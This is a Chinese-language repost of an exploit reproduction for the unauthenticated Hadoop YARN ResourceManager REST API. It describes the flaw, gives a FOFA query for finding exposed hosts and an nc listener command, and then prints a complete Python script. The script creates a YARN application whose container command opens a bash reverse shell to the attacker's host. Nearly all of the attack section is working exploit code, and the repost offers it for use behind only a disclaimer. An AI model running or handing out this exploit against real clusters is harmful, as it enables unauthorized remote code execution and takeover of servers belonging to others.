本文转载于公众号:融云攻防实验室,原文地址:
漏洞复现-Hadoop Restful API未授权
0x01 阅读须知
资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明
0x02 漏洞描述
Hadoop是一个由Apache基金会所开发的分布式系统基础架构,Hadoop通过ResourceManager REST API,可以让⽤户获取集群的相关信息。但是存在未授权接⼝:/ws/v1/cluster/apps/new-application和/ws/v1/cluster/apps,可以让⽤户⽣成并启动⼀个新的应⽤程序,在集群上进⾏处理,攻击者利用Hadoop Yarn资源管理系统REST API未授权漏洞对服务器进行攻击,可以在未授权的情况下远程执行代码。
0x03 漏洞复现
漏洞影响:Hadoop
FOFA:“Hadoop”
1.nc监听7777端口
nc.exe -lvvp 7777
1.python3执行脚本
#!/usr/bin/env python
import requests
target = \'http://x.x.x.x:8088/\'# 受害者机器
lhost = \'x.x.x.x\' # 你的监听ip
url = target + \'ws/v1/cluster/apps/new-application\'
resp = requests.post(url)
app_id = resp.json()[\'application-id\']
url = target + \'ws/v1/cluster/apps\'
data = {
\'application-id\': app_id,
\'application-name\': \'get-shell\',
\'am-container-spec\': {
\'commands\': {
\'command\': \'/bin/bash -i >& /dev/tcp/%s/7777 0>&1\' % lhost,# 监听端口
},
},
\'application-type\': \'YARN\',
}
requests.post(url, json=data)
3.得到一个shell
THE END
暂无评论内容